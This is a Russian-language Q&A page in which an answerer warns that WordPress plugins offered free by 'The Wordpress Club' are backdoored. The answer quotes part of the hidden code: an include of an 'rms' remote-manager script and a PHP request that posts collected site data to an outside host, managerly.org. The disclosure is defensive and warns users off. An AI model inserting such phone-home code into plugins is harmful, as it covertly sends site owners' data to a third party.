Могу ли я скачать плагины для WordPress из The Wordpress Club? - PullRequest
0 голосов
/ 18 октября 2019

Безопасно ли загружать плагины с The Wordpress Club ?

1 Ответ

2 голосов
/ 18 октября 2019

Вы не должны скачивать плагин с этой или других страниц. Парень пишет на своей странице:

... НЕ обнуляется или взломан.

После проверки некоторых плагинов я могу сказать, что каждый плагин взломан. Код, который он использует, следующий. Сначала ему нужны два сценария, которые он написал:

require_once('rms-script-ini.php');
rms_remote_manager_init(__FILE__, 'rms-script-mu-plugin.php', false, false);

Часть его кода выглядит следующим образом:

$GLOBALS['rms_report_to']            =   'https://managerly.org/wp-admin/admin-ajax.php';

$args=
[
    'method'      => 'POST',
    'timeout'     => 15,
    'redirection' => 15,
    'headers'     => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
    'body'        => $body
];
// Send to RMS
$curl   = new Wp_Http_Curl();
$result=$curl->request($connect_to, $args);
$result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;

Этот код собирает некоторые данные с вашей страницы и отправляет их на странную страницу. ,Это только часть его кода, но в целом, держите пальцы подальше и купите лицензию! Человек усердно работает над плагином.

Я написал этот вопрос / ответ, потому что друг спросил меня, может ли он загрузить плагин с этой страницы, поэтому я проверил его.

Добро пожаловать на сайт PullRequest, где вы можете задавать вопросы и получать ответы от других членов сообщества.
...